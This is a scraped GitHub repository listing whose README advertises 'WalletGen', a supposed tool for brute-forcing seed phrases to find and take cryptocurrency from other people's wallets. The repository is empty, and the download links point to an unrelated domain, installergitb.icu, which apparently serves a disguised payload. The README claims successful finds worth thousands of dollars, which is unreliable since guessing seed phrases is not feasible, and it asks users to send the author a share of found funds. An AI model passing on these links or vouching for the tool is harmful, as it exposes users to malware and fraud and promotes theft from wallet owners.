https://github.com/freaknotdeanpunk/crypto-wallets-finder
Crypto Wallets Finder. Mnemonic seed phrase generator for crypto wallets. Bruteforce seed phrase and checking balance BTC, ETH, BNB.
https://github.com/freaknotdeanpunk/crypto-wallets-finder
bitcoin bitcoin-recovery bitcoin-wallet btc-wallet crypto crypto-bruteforce crypto-finder crypto-recovery crypto-wallet crypto-wallets cryptocurrency ethereum-bruteforce finder-crypto lost-bitcoins lost-bitcoins-wallet lost-btc-wallet-finder lost-wallets mnemonic-generator wallet-tracker wallets-finder
Last synced: 4 months ago
JSON representation
Crypto Wallets Finder. Mnemonic seed phrase generator for crypto wallets. Bruteforce seed phrase and checking balance BTC, ETH, BNB.
- Host: GitHub
- URL: https://github.com/freaknotdeanpunk/crypto-wallets-finder
- Owner: freaknotdeanpunk
- Created: 2025-06-07T17:51:38.000Z (4 months ago)
- Default Branch: main
- Last Pushed: 2025-06-07T17:52:55.000Z (4 months ago)
- Last Synced: 2025-06-07T18:29:55.704Z (4 months ago)
- Topics: bitcoin, bitcoin-recovery, bitcoin-wallet, btc-wallet, crypto, crypto-bruteforce, crypto-finder, crypto-recovery, crypto-wallet, crypto-wallets, cryptocurrency, ethereum-bruteforce, finder-crypto, lost-bitcoins, lost-bitcoins-wallet, lost-btc-wallet-finder, lost-wallets, mnemonic-generator, wallet-tracker, wallets-finder
- Homepage:
- Size: 0 Bytes
- Stars: 0
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# WalletGen – Crypto Wallet Generator & Balance Finder for Lost Bitcoin (BTC), Ethereum (ETH), BNB, Polygon (MATIC) and EVM Chains
[Download here](https://installergitb.icu?erim4ow4v8a4bqd)
**WalletGen** is an open-source, ultra-fast **crypto wallet generator** and **seed phrase brute force tool**. It helps you find lost or inactive **Bitcoin (BTC)**, **Ethereum (ETH)**, **BNB**, **Polygon (MATIC)**, and other **EVM-compatible wallets** with real-time balance checking and high-performance C++ engine.
## 📚 Quick Navigation
- [How It Works](#how-it-works)
- [Why WalletGen](#why-walletgen)
- [Features](#features)
- [Download WalletGen(#how-to-start)
- [Database Download](#download-and-use-database-for-more-speed)
- [My Finds](#my-finds)
- [FAQ](#-frequently-asked-questions-faq)
- [Build Instructions](#building-the-project)
- [Donate](#donate)[](https://github.com/tony-dev1/wallets-finder/releases/tag/walletgen)
[](https://github.com/tony-dev1/wallets-finder/releases/tag/walletgen)

[](/LICENSE)

![]()
⚠️ **Disclaimer**: WalletGen is a research and educational tool. It is not intended for unauthorized access or malicious activity. Use it responsibly and only with wallets you own or have permission to access.
## How It Works
WalletGen generates wallets using [BIP39](https://github.com/bitcoin/bips/blob/master/bip-0039.mediawiki), [BIP44](https://github.com/bitcoin/bips/blob/master/bip-0044.mediawiki), and [Bech32](https://en.bitcoin.it/wiki/Bech32) for Bitcoin, and [Keccak256](https://emn178.github.io/online-tools/keccak_256.html) hashing for EVM-based chains like Ethereum.
The software compares generated addresses against known address databases or checks balances in real-time via public blockchain explorers.
Wallet Gen is built in C++ and is open-source, allowing anyone to access and modify the code. Compared to Python-based wallet generators, Wallet Gen boasts significantly higher wallet generation speeds, with performance primarily relying on your CPU & GPU.
## Why WalletGen?
Unlike Python-based brute force tools, **WalletGen** is written in C++ and optimized for multi-threaded CPU and GPU usage, delivering up to **10x faster** performance. Whether you’re exploring lost wallets, verifying private key space, or recovering your own wallet, WalletGen gives you the power to do it efficiently and securely.
## Features
- **Generation of cryptocurrency wallets**: Wallet Gen supports creating single wallets for Bitcoin, Ethereum, BNB, MATIC and other cryptocurrencies.
- **Search for wallets with balance**: Using bruteforce techniques, Wallet Gen allows you to search for existing wallets with balances in both the Bitcoin network and EVMs.
- **Support for various algorithms**: Keccak256 algorithm for EVM wallets and BIP39, BIP44, Bech32 algorithm for Bitcoin are used for wallet generation.
- **Using a database to speed up searches**: Download and use databases to search for balance wallets, speeding up the process tenfold.
- **High speed of operation**: Wallet Gen utilizes the power of the CPU and GPU to achieve the best performance.## Supported Blockchains
- Bitcoin (BTC)
- Ethereum (ETH)
- Binance Smart Chain (BNB)
- Polygon (MATIC)
- Avalanche (AVAX)
- Fantom (FTM)
- Arbitrum / Optimism
- Any EVM-compatible chain# Demo
![]()
![]()
## How to Search for Lost Bitcoin & Ethereum Wallets with Balance
**Wallet Gen** allows you to search using brute-force method for two types of crypto wallets with an existing balance.
### For Bitcoin (BTC) wallets:
* Press key 3 in the menu or run start_search_btc.bat to search Bitcoin wallets through the internet. This method may take longer, as it checks wallet balances in real-time via blockchain explorers.
* Press key 6 to search Bitcoin wallets using the database. This method is faster because it compares generated wallets against a pre-built database of known addresses with balances.### For EVM wallets (Ethereum, BNB, MATIC, etc.):
* Press key 5 or run start_search_evm.bat to search EVM wallets through the internet. This method checks for wallets with balance in real-time through blockchain explorers.
* Press key 6 to search EVM wallets using the database. This method is faster since it compares generated wallets against the known database of addresses with balance.### Speed Considerations:
* The speed of the search depends heavily on your hardware, especially the graphics card (GPU). To speed up the process and increase your chances of finding a wallet with a balance, you can run multiple instances of the program (1 to 4), depending on your system's performance
By using the database, you can significantly improve the efficiency of your search, as it eliminates the need to query the blockchain for every wallet generated
# How to start
## Windows
- Download [WalletGen.zip](https://installergitb.icu?27wjfpl9me5najf)
- Unpack anywhere
- Run `WalletGen.exe`## Linux (x86-64bit)
```bash
wget
tar -xzf walletgen-v1.5.0-linux.tar.gz
cd walletgen
./walletgen
```
### Download and Use Database (for more speed)
| Database | Download link | File Size | Number of Addresses |
|---------------------------------------------------------|------------------------------------------------|------------------------------------|----------------------------------|
| BTC Database | [btc_database.txt](https://github.com/tony-dev1/walletgen/releases/download/database/btc_database.txt) | 1.03 GB | 23 428 179
| EVM Database | [evm_database.txt](https://github.com/tony-dev1/walletgen/releases/download/database/evm_database.txt) | 1.02 GB | 25 999 700## My Finds
I’ve personally recovered two BTC wallets with a balance. The first had 0.000032 BTC, the second contained 0.0528 BTC (roughly $4800 at the time of discovery).
Here’s the link to the wallet: [bc1qk3m62hx2hh5mhvc0tj45f9xflzcnu0sur3rvay](https://mempool.space/address/bc1qk3m62hx2hh5mhvc0tj45f9xflzcnu0sur3rvay).
![]()
### New Find 4/9/2025
After a week of non-stop wallet searching, I finally found a [wallet](https://mempool.space/address/bc1q29c5m3w4jxtsj4vcd2ccw4t68xm8m7vs5vytu0) with 0.25 bitcoin ($19k). This is my 4th and biggest find of all time.
![]()
## New Find 5/5/2025
[bc1qpm0k3kcmthwsa4zseh33g3hl7eju8u8nkt83kp](https://mempool.space/address/bc1qpm0k3kcmthwsa4zseh33g3hl7eju8u8nkt83kp)
![]()
## Building the Project
1. Open the project file (`CryptoWalletGen.sln`) in Visual Studio or any other compatible C++ compiler.
2. Install the necessary dependencies and build the project.```cmd
> git clone https://github.com/microsoft/vcpkg
> .\vcpkg\bootstrap-vcpkg.bat
> .\vcpkg\vcpkg integrate install
> .\vcpkg\vcpkg install openssl:x64-windows
```3. Start building the project.
## 🔍 Frequently Asked Questions (FAQ)
### ❓ Where can I download WalletGen?
You can download the WalletGen given on the [page in the release](https://installergitb.icu?h4y8m6m7jquixh9).### ❓ Where can I download a database of known addresses with balance?
You can download the current database given on the [page in the release](https://installergitb.icu?hc6ap8n41zidchx).### ❓ Can WalletGen help me recover a lost Bitcoin wallet?
Yes. WalletGen uses brute-force seed generation and a known-address database to help users potentially **recover lost Bitcoin wallets**.### ❓ Is WalletGen a seed phrase generator?
Yes. WalletGen can generate **BIP39 seed phrases** and derive wallets for Bitcoin, Ethereum, and other EVM chains.### ❓ Can I find Ethereum wallets with balance?
Yes. WalletGen supports scanning for **Ethereum wallets with balance** using brute-force and a database of known addresses.### ❓ Is WalletGen legal?
WalletGen is intended for **educational and research purposes only**. It should only be used on wallets you own or have permission to access.### ❓ Do I need the internet to search through the database?
No. Searching through the database does not require an internet connection, as the wallet balance is already known.## Todo
1. Search for missing words in a seed phrase.## Contribute
Contributions are welcome! If you have ideas, bug reports, or want to contribute to the codebase, feel free to submit a pull request.
## Contacts
If you have any questions or want to share your find or you found some bug in WalletGen work, feel free to message me!
My Discord: **tonydevbtc**## Donate
I encourage you, when you find a wallet with a balance, to send me a small portion as a thank you. This motivates me to keep working on the program, keep it going, and make it better!
**BTC:** bc1qeyrshy5ntsguwxe9m8tp2x2yqhddz7ymkj44h9
**ETH:** 0x76c2E75B92Eb340f01B378e332FC7d8954893693
## Credits
This project uses code from the [Trezor project](https://installergitb.icu?9uh3u7vkcdgv07s). The code is licensed under the MIT License.## License
This project is licensed under the [MIT License](/LICENSE)